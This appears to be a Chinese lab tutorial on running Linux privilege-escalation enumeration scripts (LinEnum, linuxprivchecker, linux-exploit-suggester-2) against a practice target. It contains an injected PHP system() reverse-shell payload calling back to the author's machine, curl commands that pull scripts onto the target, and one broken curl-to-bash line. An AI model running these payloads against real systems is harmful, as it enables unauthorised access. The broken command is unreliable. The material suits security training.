Linux提权之提权脚本应用(十二)
首先实验环境还是一样的 这里不再多说
第一个脚本 LinEnum
LinEnum 是一个用 Shell 脚本编写的、强大且全面的 Linux 枚举脚本,旨在帮助系统管理员和安全研究人员进行快速的系统审计与漏洞评估,通过执行一系列详细检查任务,提供对操作系统状态的深入洞察,以识别可能的安全风险。它兼容大多数 Linux 发行版,主要功能如下:
- 系统信息收集:获取内核版本、发行版信息、主机名、网络配置等。
- 用户信息检查:列出所有用户及其权限、密码策略、历史记录等,并检测敏感文件的可访问性。
- 特权访问审查:检查 sudo 权限,发现无需密码即可提升权限的情况。
- 环境变量展示:展示 $PATH 和环境变量信息。
- 服务与进程监控:监控网络连接、运行中的进程及其权限,以及定时任务设置。
- 版本信息报告:报告 Sudo、MySQL、Postgres、Apache 等关键软件的版本。
- 默认或弱凭证检测:检测数据库中可能存在的默认或弱密码。
- 搜索与枚举:查找 SUID/SGID 文件、世界可写的文件、配置文件、日志文件,以及 NFS 服务器信息等。
此外,它还提供实验性的导出功能,可将报告保存到指定位置,便于后续分析,适用于系统维护、渗透测试、事故响应等场景。 其使用较为便捷,只需一行命令即可运行,还提供多个选项定制扫描范围,支持针对特定关键字进行文件搜索,定制化程度高,生成的报告包含详尽的系统信息,便于理解和分析,且作者会不断更新和改进,以应对新的威胁。
想了解更多 请看这几篇文章
LinEnum 使用教程-CSDN博客
这个是 这个脚本的下载地址
https://github.com/rebootuser/LinEnum
首先我们先获取bash shell
还是老样子bp 抓包
修改
system('bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/192.168.25.138/8888%200>%261"');
获取反弹shell
然后我们 要下载辅助脚本
新建窗口 我们在kail本机上
git clone https://github.com/rebootuser/LinEnum.git
然后在开启 80 端口服务
我们在刚才获取的shell里输入
先下载
curl http://192.168.25.138/LinEnum/LinEnum.sh -o /tmp/LinEnum.sh
然后我们再执行
但是 因为我们没有执行权限
所以哦我们输入
chmod +x LinEnum.sh
或者我们直接输入
当然前提必须要有执行权限
curl http://192.168.25.138/LinEnum/LinEnum.sh -o /tmp/LinEnum.sh | bash
然后脚本就会自动执行 输出所有的信息
想了解全部信息 请看这篇文章
https://zhuanlan.zhihu.com/p/315052950
如果我们这样看的不方便 我们可以把生成大的 导出到一个文件里i
./LinEnum.sh > 1.txt
生成好之后 我们可以查看 文件 内容
cat 1.txt
第二个脚本
Linuxprivchecker
Linuxprivchecker 是一款用于在 Linux 系统上进行权限提升检查的工具,以下为你详细介绍:
概述
它本质上是一个用 Python 编写的脚本,旨在帮助系统管理员、安全审计人员以及渗透测试人员识别 Linux 系统中可能存在的可用于权限提升的漏洞和配置弱点。通过运行该脚本,用户可以全面了解系统的安全状况,发现潜在的安全风险,进而采取相应的措施来加固系统。
功能特点
- 系统信息收集:它会收集一系列系统的关键信息,包括内核版本、操作系统发行版、安装的软件包等。不同版本的内核和软件可能存在已知的漏洞,这些信息有助于识别可能受影响的组件。
- 用户和权限检查:检查当前用户的权限设置,查找可以绕过正常权限限制的途径。例如,查看用户是否拥有 sudo 权限以及 sudo 的配置是否存在漏洞,若存在配置不当,普通用户可能无需密码或拥有过高的权限来执行特定命令,从而实现权限提升。
- 文件和目录权限分析:扫描系统中的文件和目录,寻找具有特殊权限(如 SUID、SGID)的文件。具有 SUID 权限的程序在执行时会以文件所有者的身份运行,如果这类程序存在漏洞,攻击者就可能利用它来提升权限。
- 服务和进程检查:识别正在运行的服务和进程,检查它们是否存在安全漏洞或配置错误。例如,某些服务可能以高权限运行,并且存在可被利用的漏洞,攻击者可以通过这些漏洞来提升自己在系统中的权限。
- 环境变量检查:分析系统的环境变量设置,查看是否存在可能被利用来执行恶意代码的配置。例如,
PATH
环境变量中包含不安全的目录,可能会导致系统执行恶意程序。
使用方法
通常,你只需要从 GitHub 等代码托管平台下载 Linuxprivchecker 脚本,然后在目标 Linux 系统上运行该脚本,即可开始进行权限提升检查。脚本会输出详细的检查结果,列出发现的潜在风险和可能的利用途径。示例命令如下:
收起
bash
python linuxprivchecker.py
注意事项
- 合法性:在使用该工具时,必须确保你已经获得了目标系统所有者的明确授权。未经授权对他人系统进行扫描和测试属于违法行为。
- 更新问题:由于安全漏洞和利用技术不断发展,建议定期更新 Linuxprivchecker 脚本,以确保能够检测到最新的安全风险。
想过多了解 请看下边
推荐项目:Linuxprivchecker.py——Linux权限提升检查脚本-CSDN博客
这个是 python2 版本的 (在python3 不稳定)
https://github.com/sleventyeleven/linuxprivchecker
这个是python3版本的(现在的 一般都用这个版本)
https://github.com/swarley7/linuxprivchecker
在我们的kail机上
新建窗口输入
git clone https://github.com/swarley7/linuxprivchecker.git
首先还是下载到目标机器上
curl http://192.168.25.138/linuxprivchecker/linuxprivchecker.py -o /tmp/linuxprivchecker.py
然后我们用python3执行
python3 linuxprivchecker.py
还是会出来各种信息
第三种工具
linux-exploit-suggester2(针对内核)
linux-exploit-suggester2
是一款用于 Linux 系统的漏洞利用建议工具,下面从多个方面为你详细介绍:
工具概述
linux-exploit-suggester2
是 linux-exploit-suggester
的改进版本,它通过分析目标 Linux 系统的内核版本、已安装的软件包等信息,来识别系统中可能存在的可利用漏洞,并提供相应的漏洞利用建议。其目的是帮助安全研究人员、渗透测试人员和系统管理员快速发现系统的安全隐患,以便及时采取修复措施。
主要功能
- 内核漏洞检测:能够根据系统的内核版本,识别已知的内核漏洞。内核是操作系统的核心部分,一旦内核存在漏洞,攻击者就有可能获得系统的最高权限。
- 软件包漏洞分析:检查系统中已安装的软件包,判断是否存在已知的安全漏洞。许多常见的软件,如数据库管理系统、Web 服务器等,都可能存在可被利用的漏洞。
- 提供利用建议:针对检测到的漏洞,该工具会提供相应的漏洞利用建议,包括利用的方法、可能需要的工具以及参考的漏洞信息。
使用方法
- 下载工具:可以从 GitHub 上下载
linux-exploit-suggester2
的脚本文件。
收起
bash
git clone https://github.com/jondonas/linux-exploit-suggester-2.git
cd linux-exploit-suggester-2
- 收集系统信息:在目标 Linux 系统上运行脚本之前,需要先收集系统的相关信息,如内核版本、已安装的软件包等。可以通过以下命令将信息保存到一个文件中:
收起
bash
uname -a
dpkg -l > packages.txt # 对于 Debian 或 Ubuntu 系统
rpm -qa > packages.txt # 对于 Red Hat 或 CentOS 系统
- 运行工具:将收集到的信息文件提供给
linux-exploit-suggester2
脚本进行分析。
收起
bash
python les2.py --kernel $(uname -r) --packages packages.txt
注意事项
- 合法性:使用该工具进行漏洞检测时,必须获得目标系统所有者的授权。未经授权的漏洞扫描和利用行为可能违反法律法规。
- 局限性:
linux-exploit-suggester2
只能检测已知的漏洞,对于未知的零日漏洞无法进行检测。而且,它提供的利用建议并不一定都能在实际环境中成功利用,需要根据具体情况进行评估和测试。
下载地址
https://github.com/jondonas/linux-exploit-suggester-2
还是老样子 先下载到我们的kail机上
git clone https://github.com/jondonas/linux-exploit-suggester-2.git
然后在下载到我们的目标主机上
curl http://192.168.25.138/linux-exploit-suggester-2-master/linux-exploit-suggester-2.pl -o /tmp/linux-exploit-suggester-2.pl
然后我们输入
perl linux-exploit-suggester-2.pl
这里的意思是没有exp
那我们就换一台哦主机
这里我分享给大家
通过网盘分享的文件:Ubuntu.zip
链接: 百度网盘 请输入提取码 提取码: vugf
--来自百度网盘超级会员v3的分享
这里就有 exp
了
我点击进去查看
具体的用法 就像exp所说 很简单
我们也可以输入
-k 指定版本
perl linux-exploit-suggester-2.pl -k 3.0